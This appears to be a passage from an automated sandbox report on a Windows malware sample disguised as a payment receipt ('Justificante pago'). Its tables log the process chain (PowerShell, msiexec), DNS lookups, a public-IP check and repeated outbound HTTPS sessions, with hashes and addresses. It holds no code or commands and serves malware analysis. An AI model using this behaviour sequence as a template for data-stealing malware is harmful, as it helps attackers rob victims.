Dec 16, 2024 18:29:10.146505117 CET | 49768 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:10.147077084 CET | 49779 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:10.266858101 CET | 80 | 49768 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:10.266881943 CET | 80 | 49779 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:10.267049074 CET | 49768 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:10.267090082 CET | 49779 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:10.267282963 CET | 49779 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:10.389045954 CET | 80 | 49779 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:11.475013018 CET | 80 | 49779 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:11.476430893 CET | 49781 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:11.476522923 CET | 443 | 49781 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:11.476660013 CET | 49781 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:11.476874113 CET | 49781 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:11.476908922 CET | 443 | 49781 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:11.519557953 CET | 49779 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:12.708429098 CET | 443 | 49781 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:12.710028887 CET | 49781 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:12.710076094 CET | 443 | 49781 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:13.174031019 CET | 443 | 49781 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:13.174108028 CET | 443 | 49781 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:13.174432993 CET | 49781 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:13.174627066 CET | 49781 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:13.177759886 CET | 49779 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:13.178721905 CET | 49787 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:13.297971964 CET | 80 | 49779 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:13.298096895 CET | 49779 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:13.298592091 CET | 80 | 49787 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:13.298687935 CET | 49787 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:13.298779011 CET | 49787 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:13.419991016 CET | 80 | 49787 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:14.506438017 CET | 80 | 49787 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:14.508114100 CET | 49792 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:14.508169889 CET | 443 | 49792 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:14.508605957 CET | 49792 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:14.508754015 CET | 49792 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:14.508781910 CET | 443 | 49792 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:14.550704956 CET | 49787 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:15.733314991 CET | 443 | 49792 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:15.735764980 CET | 49792 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:15.735786915 CET | 443 | 49792 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:16.426434994 CET | 443 | 49792 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:16.426491976 CET | 443 | 49792 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:16.426594019 CET | 49792 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:16.426959038 CET | 49792 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:16.430339098 CET | 49787 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:16.431543112 CET | 49797 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:16.551002026 CET | 80 | 49787 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:16.551101923 CET | 49787 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:16.551302910 CET | 80 | 49797 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:16.551404953 CET | 49797 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:16.551518917 CET | 49797 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:16.671205044 CET | 80 | 49797 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:17.767580986 CET | 80 | 49797 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:17.769241095 CET | 49800 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:17.769296885 CET | 443 | 49800 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:17.769428968 CET | 49800 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:17.769731998 CET | 49800 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:17.769752026 CET | 443 | 49800 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:17.816356897 CET | 49797 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:18.986018896 CET | 443 | 49800 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:18.988019943 CET | 49800 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:18.988111973 CET | 443 | 49800 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:19.459614038 CET | 443 | 49800 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:19.459707022 CET | 443 | 49800 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:19.459943056 CET | 49800 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:19.460345030 CET | 49800 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:19.488951921 CET | 49797 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:19.609277010 CET | 80 | 49797 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:19.609510899 CET | 49797 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:19.629319906 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:19.629420042 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:19.629617929 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:19.629955053 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:19.629975080 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.010432005 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.010642052 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:21.012823105 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:21.012852907 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.013076067 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.014354944 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:21.059334993 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.514730930 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.514905930 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:21.514977932 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:21.518995047 CET | 49806 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:27.617630005 CET | 49742 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:27.864825010 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:27.864883900 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:27.865098953 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:27.865300894 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:27.865314960 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:29.230302095 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:29.232424974 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:29.232542038 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:29.232673883 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:29.232686043 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:29.989142895 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:29.989244938 CET | 443 | 49825 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:29.989326000 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:29.989803076 CET | 49825 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:31.519962072 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:31.520006895 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:31.520112991 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:31.520977020 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:31.520992994 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:32.883877993 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:32.885648012 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:32.885694981 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:32.885715961 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:32.885730982 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:33.543570042 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:33.543788910 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4 |
Dec 16, 2024 18:29:33.543864012 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Dec 16, 2024 18:29:33.544275999 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 16, 2024 18:28:41.953442097 CET | 57921 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 16, 2024 18:28:42.092575073 CET | 53 | 57921 | 1.1.1.1 | 192.168.2.4 |
Dec 16, 2024 18:28:44.740622044 CET | 55485 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 16, 2024 18:28:44.878988028 CET | 53 | 55485 | 1.1.1.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.456899881 CET | 61127 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 16, 2024 18:28:50.595096111 CET | 53 | 61127 | 1.1.1.1 | 192.168.2.4 |
Dec 16, 2024 18:28:52.709714890 CET | 63341 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 16, 2024 18:28:53.164560080 CET | 53 | 63341 | 1.1.1.1 | 192.168.2.4 |
Dec 16, 2024 18:29:19.489572048 CET | 60090 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 16, 2024 18:29:19.628176928 CET | 53 | 60090 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 16, 2024 18:28:41.953442097 CET | 192.168.2.4 | 1.1.1.1 | 0xb53b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 16, 2024 18:28:44.740622044 CET | 192.168.2.4 | 1.1.1.1 | 0xc8c7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 16, 2024 18:28:50.456899881 CET | 192.168.2.4 | 1.1.1.1 | 0x2144 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 16, 2024 18:28:52.709714890 CET | 192.168.2.4 | 1.1.1.1 | 0x1dfe | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 16, 2024 18:29:19.489572048 CET | 192.168.2.4 | 1.1.1.1 | 0x8ede | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 16, 2024 18:28:42.092575073 CET | 1.1.1.1 | 192.168.2.4 | 0xb53b | No error (0) | 172.217.19.174 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:44.878988028 CET | 1.1.1.1 | 192.168.2.4 | 0xc8c7 | No error (0) | 142.250.181.1 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:53.164560080 CET | 1.1.1.1 | 192.168.2.4 | 0x1dfe | No error (0) | 104.21.67.152 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:28:53.164560080 CET | 1.1.1.1 | 192.168.2.4 | 0x1dfe | No error (0) | 172.67.177.134 | A (IP address) | IN (0x0001) | false | ||
Dec 16, 2024 18:29:19.628176928 CET | 1.1.1.1 | 192.168.2.4 | 0x8ede | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:28:50.720628977 CET | 151 | OUT | |
Dec 16, 2024 18:28:51.925323009 CET | 321 | IN | |
Dec 16, 2024 18:28:51.928620100 CET | 127 | OUT | |
Dec 16, 2024 18:28:52.303622007 CET | 321 | IN | |
Dec 16, 2024 18:28:54.864197969 CET | 127 | OUT | |
Dec 16, 2024 18:28:55.238343954 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:28:57.093662024 CET | 127 | OUT | |
Dec 16, 2024 18:28:58.322419882 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49750 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:29:00.176654100 CET | 151 | OUT | |
Dec 16, 2024 18:29:02.105992079 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49761 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:29:03.937235117 CET | 151 | OUT | |
Dec 16, 2024 18:29:05.424324989 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49768 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:29:07.228050947 CET | 151 | OUT | |
Dec 16, 2024 18:29:08.436230898 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49779 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:29:10.267282963 CET | 151 | OUT | |
Dec 16, 2024 18:29:11.475013018 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49787 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:29:13.298779011 CET | 151 | OUT | |
Dec 16, 2024 18:29:14.506438017 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49797 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 16, 2024 18:29:16.551518917 CET | 151 | OUT | |
Dec 16, 2024 18:29:17.767580986 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49736 | 172.217.19.174 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:28:43 UTC | 216 | OUT | |
2024-12-16 17:28:44 UTC | 1920 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49737 | 142.250.181.1 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:28:46 UTC | 258 | OUT | |
2024-12-16 17:28:49 UTC | 4947 | IN | |
2024-12-16 17:28:49 UTC | 4947 | IN | |
2024-12-16 17:28:49 UTC | 4800 | IN | |
2024-12-16 17:28:49 UTC | 1327 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN | |
2024-12-16 17:28:49 UTC | 1390 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49739 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:28:54 UTC | 85 | OUT | |
2024-12-16 17:28:54 UTC | 878 | IN | |
2024-12-16 17:28:54 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49740 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:28:56 UTC | 61 | OUT | |
2024-12-16 17:28:56 UTC | 886 | IN | |
2024-12-16 17:28:56 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49744 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:28:59 UTC | 85 | OUT | |
2024-12-16 17:29:00 UTC | 880 | IN | |
2024-12-16 17:29:00 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49756 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:03 UTC | 85 | OUT | |
2024-12-16 17:29:03 UTC | 878 | IN | |
2024-12-16 17:29:03 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49765 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:06 UTC | 85 | OUT | |
2024-12-16 17:29:07 UTC | 873 | IN | |
2024-12-16 17:29:07 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49774 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:09 UTC | 85 | OUT | |
2024-12-16 17:29:10 UTC | 884 | IN | |
2024-12-16 17:29:10 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49781 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:12 UTC | 61 | OUT | |
2024-12-16 17:29:13 UTC | 876 | IN | |
2024-12-16 17:29:13 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49792 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:15 UTC | 85 | OUT | |
2024-12-16 17:29:16 UTC | 874 | IN | |
2024-12-16 17:29:16 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49800 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:18 UTC | 85 | OUT | |
2024-12-16 17:29:19 UTC | 872 | IN | |
2024-12-16 17:29:19 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.4 | 49806 | 149.154.167.220 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:21 UTC | 349 | OUT | |
2024-12-16 17:29:21 UTC | 344 | IN | |
2024-12-16 17:29:21 UTC | 55 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.4 | 49825 | 149.154.167.220 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:29 UTC | 344 | OUT | |
2024-12-16 17:29:29 UTC | 581 | OUT | |
2024-12-16 17:29:29 UTC | 388 | IN | |
2024-12-16 17:29:29 UTC | 526 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.4 | 49833 | 149.154.167.220 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-16 17:29:32 UTC | 374 | OUT | |
2024-12-16 17:29:32 UTC | 7046 | OUT | |
2024-12-16 17:29:33 UTC | 388 | IN | |
2024-12-16 17:29:33 UTC | 539 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 12:27:57 |
Start date: | 16/12/2024 |
Path: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'106'880 bytes |
MD5 hash: | 4252CD5753DEF4A484FB3313E1029E66 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 12:28:00 |
Start date: | 16/12/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd20000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 12:28:00 |
Start date: | 16/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 12:28:34 |
Start date: | 16/12/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 22.2% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 17% |
Total number of Nodes: | 1383 |
Total number of Limit Nodes: | 34 |
Graph
Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
